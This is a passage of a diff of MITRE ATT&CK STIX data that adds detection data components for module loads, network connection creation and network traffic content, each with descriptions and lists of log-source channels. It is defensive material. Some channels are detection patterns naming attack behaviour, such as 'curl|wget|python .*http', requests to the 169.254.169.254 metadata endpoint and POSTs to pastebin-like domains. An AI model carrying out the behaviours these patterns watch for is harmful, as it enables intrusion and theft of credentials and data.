+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DYLD event subsystem"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Process linked with libcrypto.so making external connections"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events with dylib load activity"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=7"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "CLR Assembly creation, loading, or modification logs via MSSQL CLR integration"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process memory maps new dylib (dylib_load event)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Dylib loaded from abnormal location"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=3033"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=3063"
+                        },
+                        {
+                            "name": "auditd:MMAP",
+                            "channel": "load: Loading of libzip.so, libz.so, or libbz2.so by processes not normally associated with archiving"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Loading of libz.dylib, libarchive.dylib by non-standard applications"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "suspicious dlopen/dlsym usage in non-development processes"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Non-standard Office startup component detected (e.g., unexpected DLL path)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mmap"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "unexpected module load"
+                        },
+                        {
+                            "name": "snmp:status",
+                            "channel": "Status change in cryptographic hardware modules (enabled -> disabled)"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "module load"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "delay/sleep library usage in user context"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kmod"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.kextd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "loading of unexpected dylibs compared to historical baselines"
+                        },
+                        {
+                            "name": "auditd:file-events",
+                            "channel": "open of suspicious .so from non-standard paths"
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "DYLD_INSERT_LIBRARIES anomalies"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "dmesg"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_KEXTLOAD"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "module load or memory map path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch and dylib load"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Processes linked with libssl/libcrypto performing network activity"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-ImageLoad",
+                            "channel": "provider: Unsigned/user-writable image loads into msbuild.exe"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Short burst of file I/O followed by JNI/dlopen of a newly created .so"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "dyld: dlopen/dyld_cache load from non-standard app-writable path"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-01-29 17:21:27.873000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0016\", \"old_value\": \"https://attack.mitre.org/data-components/DC0016\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0082",
+                            "external_id": "DC0082"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Connection Creation",
+                    "description": "The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.\n\n*Data Collection Measures:*\n\n- Windows:\n    - Event ID 5156 \u2013 Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.\n- Linux/macOS:\n    - Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.\n    - AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.\n    - Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.\n- Cloud & Network Infrastructure:\n    - AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.\n    - Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.\n- Endpoint Detection & Response (EDR):\n    - Detect anomalous network activity such as new C2 connections or data exfiltration attempts.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "log entries indicating network connection initiation on macOS"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execs of chromium, google-chrome, firefox, libreoffice with http(s) in cmdline"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect/sendto"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open or connect syscalls on /tmp/ssh-* or $SSH_AUTH_SOCK"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect with TLS context by unexpected process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/bind: New bind() to a previously closed port shortly after the sequence."
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "sendto/connect"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "outbound connections"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/bind: Process binds to a new local port shortly after knock"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect calls showing SSH processes forwarding arbitrary ports"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat,connect -k discovery"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound connection to 169.254.169.254 from EC2 workload"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Large transfer volume (>20MB) from RDS IP range to external public IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "High outbound traffic from new region resource"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound connections to port 22, 3389"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Traffic observed on mirror destination instance"
+                        },
+                        {
+                            "name": "cni:netflow",
+                            "channel": "outbound connection to internal or external APIs"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "socket connect"
+                        },
+                        {
+                            "name": "esxi:esxupdate",
+                            "channel": "/var/log/esxupdate.log or /var/log/vmksummary.log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "System service interactions"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Service initiated connections"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Service-Based Network Connection"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "protocol egress"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network activity"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network session initiation with external HTTPS services"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "family=AF_PACKET or protocol raw; process name not in allowlist."
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "network"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "postfix/smtpd"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "New Wi-Fi connection established or repeated association failures"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=3, 22"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_CONNECT"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events/socket_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execution of trusted tools interacting with external endpoints"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd or network_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events + launchd"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events, socket_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CONNECT: Long-lived connections from remote-control parents to external IPs/domains"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "connection attempts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "connection open"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network connection events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "First outbound connection from the same PID/user shortly after an inbound trigger."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network sessions initiated by remote desktop apps"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Inbound connections to VNC/SSH ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outbound Traffic"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "networkd or socket"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream network activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Association and authentication events including failures and new SSIDs"
+                        },
+                        {
+                            "name": "Network",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "networkdevice:Flow",
+                            "channel": "Traffic from mirrored interface to mirror target IP"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Dynamic route changes"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "web domain alerts"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "New outbound connection from Safari/Chrome/Firefox/Word"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connections from newly spawned child processes or from the browser to uncommon endpoints or on anomalous ports"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connection after script or installer launch"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Outbound Connections"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "proxy or TLS inspection logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New TCP/443 or TCP/80 to domain not previously seen for the user/host"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connection to *.tunnels.api.visualstudio.com or *.devtunnels.ms"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connections to *.devtunnels.ms or tunnels.api.visualstudio.com"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPs connection to tunnels.api.visualstudio.com"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound or inbound TFTP file transfers of ROMMON or firmware binaries"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection: TCP connections to ports 139/445 to multiple hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection: SMB connections to multiple internal hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound HTTP/S initiated by newly installed interpreter process"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "outbound connections to RMM services or to unusual destination ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Multiple failed connections (conn_state=REJ/S0 or history has 'R') across distinct ports from the same src_ip followed by success to a specific port."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Sequence of REJ/S0 then SF success from same src_ip within TimeWindow."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Series of denied/closed flows to distinct ports then success to mgmt port from same src_ip within TimeWindow."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic spike through formerly blocked ports/subnets following config change"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New egress to Internet by the same UID/host shortly after terminal exec"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection: Inbound connections to SSH or VPN ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "External access to container ports (2375, 6443)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "remote access"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound Connections"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection attempts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "High-volume or repeated SNMP GETBULK/GETNEXT queries from untrusted or external IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "outbound connections from host during or immediately after image build"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "new outbound connection from browser/office lineage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "new outbound connection from exploited lineage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Multiple failed connections to closed ports (history contains 'R' or conn_state in {REJ, S0}) followed by a successful handshake to a new port from same src within TimeWindowKnock"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Closed-port hits followed by success from same src_ip"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Port-knock pattern from one src to device unicast,broadcast,network addresses on same port within TimeWindowKnock"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected inbound/outbound TFTP traffic for device image files"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected or unauthorized inbound connections to SNMP, NETCONF, or RESTCONF services"
+                        },
+                        {
+                            "name": "snmp:access",
+                            "channel": "GETBULK/GETNEXT requests for OIDs associated with configuration parameters"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Bits-Client/Operational",
+                            "channel": "BITS job lifecycle events such as job create/modify/transfer/complete and URL/remote name fields"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-WLAN-AutoConfig",
+                            "channel": "EventCode=8001, 8002, 8003"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=5156, 5157"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=3, 22"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=8001"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-04-23 18:37:33.992000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.771000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0085",
+                            "external_id": "DC0085"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Traffic Content",
+                    "description": "The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.\n\n*Data Collection Measures:*\n\n- Network Packet Capture (Full Content Logging)\n    - Wireshark / tcpdump / tshark\n        - Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`\n    - Zeek (formerly Bro)\n        - Extracts protocol headers and payload details into structured logs. `echo \"redef Log::default_store = Log::ASCII;\" > local.zeek | zeek -Cr capture.pcap local.zeek`\n    - Suricata / Snort (IDS/IPS with PCAP Logging)\n        - Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`\n- Host-Based Collection\n    - Sysmon Event ID 22 \u2013 DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated, Logs process-to-network connection relationships.\n    - AuditD (Linux) \u2013 syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`\n- Cloud & SaaS Traffic Collection\n    - AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.\n    - Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "ALB:HTTPLogs",
+                            "channel": "AWS ALB/ELB/GCP/Azure Application Gateway HTTP logs with unusual methods, long URIs, serialized payloads, 4xx/5xx bursts"
+                        },
+                        {
+                            "name": "apache:access_log",
+                            "channel": "Unusual HTTP POST or PUT requests to paths such as '/uploads/', '/admin/', or CMS plugin folders"
+                        },
+                        {
+                            "name": "API:ConfigRepoAudit",
+                            "channel": "Access to configuration repository endpoints, unusual enumeration requests or mass downloads"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "setsockopt, ioctl modifying ARP entries"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Traffic between instances"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Large volume of malformed or synthetic payloads to application endpoints prior to failure"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Unusual volume of data transferred from S3 storage endpoints to non-corporate IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "High volume internal-to-internal IP transfer or cross-account cloud transfer"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "networkInsightsLogs"
+                        },
+                        {
+                            "name": "azure:vpcflow",
+                            "channel": "HTTP requests to 169.254.169.254 or Azure Metadata endpoints"
+                        },
+                        {
+                            "name": "container:proxy",
+                            "channel": "outbound/inbound network activity from spawned pods"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "remote API calls to /containers/create or /containers/{id}/start"
+                        },
+                        {
+                            "name": "docker:stats",
+                            "channel": "unusual network TX/RX byte deltas"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "Process within container accesses link-local address 169.254.169.254"
+                        },
+                        {
+                            "name": "EDR:hunting",
+                            "channel": "Advanced Hunting: DeviceProcessEvents + DeviceNetworkEvents"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "Socket sessions with randomized payloads inconsistent with TLS"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "listening sockets bound to non-standard ports"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "listening sockets bound with non-standard encapsulated protocols"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "Socket inspection showing RSA key exchange outside baseline endpoints"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Network activity"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Outbound traffic using encoded payloads post-login"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "HTTPS POST connections to webhook endpoints"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Inspection of sockets showing encrypted sessions from non-baseline processes"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "HTTPS POST connections to pastebin-like domains"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network stack module logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Suspicious traffic filtered or redirected by VM networking stack"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMCI syslog entries"
+                        },
+                        {
+                            "name": "esxi:vob",
+                            "channel": "NFS/remote access logs"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-NDIS-PacketCapture",
+                            "channel": "TLS Handshake/Network Flow"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-WinINet",
+                            "channel": "HTTPS Inspection"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-WinINet",
+                            "channel": "WinINet API telemetry"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "network.query*"
+                        },
+                        {
+                            "name": "gcp:vpcflow",
+                            "channel": "first 5m egress to unknown ASNs"
+                        },
+                        {
+                            "name": "IDS:TLSInspection",
+                            "channel": "Malformed certs, incomplete asymmetric handshakes, or invalid CAs"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Query to suspicious domain with high entropy or low reputation"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "curl|wget|python .*http"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unexpected SQL or application log entries showing tampered or malformed data"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Integrity mismatch warnings or malformed packets detected"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "DNS response IPs followed by connections to non-standard calculated ports"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Multiple NXDOMAIN responses and high entropy domains"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "External HTTP/DNS connection from Office binary shortly after macro trigger"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process + network metrics correlation for bandwidth saturation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DNS query with pseudo-random subdomain patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network flow"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "curl|osascript.*open location"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem: com.apple.network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open URL|clicked link|LSQuarantineAttach"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Connections to suspicious domains with mismatched certificate or unusual patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "HTTP POST with encoded content in user-agent or cookie field"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious outbound HTTPS requests to domains flagged as newly registered or untrusted after spearphishing message interaction"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream (subsystem: com.apple.system.networking)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Encrypted connection with anomalous payload entropy"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Rapid incoming TLS handshakes or HTTP requests in quick succession"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network, socket, and http logs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DNS responses followed by connections to ports outside standard ranges"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Persistent outbound traffic to mining domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Encrypted session initiation by unexpected binary"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "eventMessage = 'promiscuous'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound HTTPS connections to code repository APIs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "eventMessage = 'open', 'sendto', 'connect'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dns-sd, mDNSResponder, socket activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process + network activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.WebKit"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem: com.apple.WebKit or com.apple.WebKit.Networking"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "encrypted outbound traffic carrying unexpected application data"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Persistent outbound connections with consistent periodicity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "TLS connections with abnormal handshake sequence or self-signed cert"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Web server process initiating outbound TCP connections not tied to normal server traffic"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound TLS connections to cloud storage providers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound HTTPS connections to cloud storage APIs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process, network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process = 'ssh' OR eventMessage CONTAINS 'ssh'"
+                        },
+                        {
+                            "name": "Netfilter/iptables",
+                            "channel": "Forwarded packets log"
+                        },
+                        {
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "networkconfig ",
+                            "channel": "interface flag PROMISC, netstat | ip link | ethtool"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "NAT table modification (add/update/delete rule)"
+                        },
+                        {
+                            "name": "networkdevice:IDS",
+                            "channel": "content inspection / PCAP / HTTP body"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "ACL/Firewall rule modification or new route injection"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config change (e.g., logging buffered, pcap buffers)"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Authentication failures, unexpected community string usage, or unauthorized SNMPv1/v2 requests"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Authentication failures or unusual community string usage in SNMP queries"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Symmetric encryption detected without TLS handshake sequence"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "TLS handshake + HTTP headers"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Abnormal certificate chains or non-standard ports carrying TLS"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Unusual POST requests to admin or upload endpoints"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
+                        },
+                        {
